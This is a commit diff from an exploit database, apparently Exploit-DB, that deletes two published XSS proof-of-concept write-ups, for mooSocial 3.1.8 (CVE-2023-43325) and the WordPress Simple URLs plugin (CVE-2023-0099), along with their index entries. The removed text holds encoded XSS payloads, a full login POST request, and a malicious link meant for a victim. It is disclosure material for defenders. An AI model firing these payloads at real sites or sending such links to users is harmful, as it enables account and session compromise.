DB: 2024-03-01

5 changes to exploits/shellcodes/ghdb mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page Wordpress 'simple urls' Plugin < 115 - XSS
2024-03-01 00:16:37 +00:00 · 2024-03-01 00:16:37 +00:00 · d0ee8ba723
commit d0ee8ba723
parent 59f10b7f45
3 changed files with 0 additions and 57 deletions
--- a/exploits/php/webapps/51766.txt
+++ b/exploits/php/webapps/51766.txt
@ -1,31 +0,0 @@
 # Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page
 # Date: 26 September 2023
 # Exploit Author: Astik Rawat (ahrixia)
 # Vendor Homepage: https://moosocial.com
 # Software Link: https://travel.moosocial.com/
 # Version: 3.1.8
 # Tested on: Windows 11
 # CVE : CVE-2023-43325
 Description:
 A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website.
 Steps to exploit:
 1) Go to Login page on the website and login with credentials.
 2) Insert your payload in the "data[redirect_url]" - POST Request
 	Proof of concept (Poc):
 	The following payload will allow you to execute XSS -
 	Payload (Plain text):
 	test"><img src=a onerror=alert(1)>test
 	Payload (Base64 encoded) :
 	dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
 	Final Payload (Base64+Url encoded):
 	dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d
 	POST Request on /moosocial/users/login (POST REQUEST DATA ONLY):
 	[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]
--- a/exploits/php/webapps/51783.txt
+++ b/exploits/php/webapps/51783.txt
@ -1,24 +0,0 @@
 # Exploit Title: simple urls < 115  XSS
 # Google Dork:
 # Exploit Author: AmirZargham
 # Vendor Homepage: https://getlasso.co/
 # Software Link: https://wordpress.org/plugins/simple-urls/
 # Version: < 115
 # Tested on: firefox,chrome
 # CVE: CVE-2023-0099
 # CWE: CWE-79
 # Platform: MULTIPLE
 # Type: WebApps
 Description
 The Simple URLs WordPress plugin before 115 does not sanitise and escape
 some parameters before outputting them back in some pages, leading to
 Reflected Cross-Site Scripting.
 Usage Info:
 send malicious link to victim:
 https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=
 <script>alert(origin)</script>
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -23675,7 +23675,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip,
 27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,,
 51766,exploits/php/webapps/51766.txt,"mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page",2024-02-02,"Astik Rawat",webapps,php,,2024-02-02,2024-02-02,0,,,,,,
 51670,exploits/php/webapps/51670.txt,"mooSocial 3.1.8 - Reflected XSS",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,1,CVE-2023-4173,,,,,
 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,,
 9121,exploits/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,webapps,php,,2009-07-09,,1,OSVDB-55796;CVE-2009-3713,,,,,
@ -32618,7 +32617,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,,2018-04-09,2018-04-09,0,,,,,,
 51156,exploits/php/webapps/51156.txt,"WooCommerce v7.1.0 - Remote Code Execution(RCE)",2023-03-31,"Milad karimi",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
 12576,exploits/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,webapps,php,,2010-05-10,,1,,,,,,
 51783,exploits/php/webapps/51783.txt,"Wordpress 'simple urls' Plugin < 115 - XSS",2024-02-05,AmirZargham,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,,
 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,,
 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",2021-09-20,"David Utón",webapps,php,,2021-09-20,2021-09-20,0,CVE-2021-29447,,,,,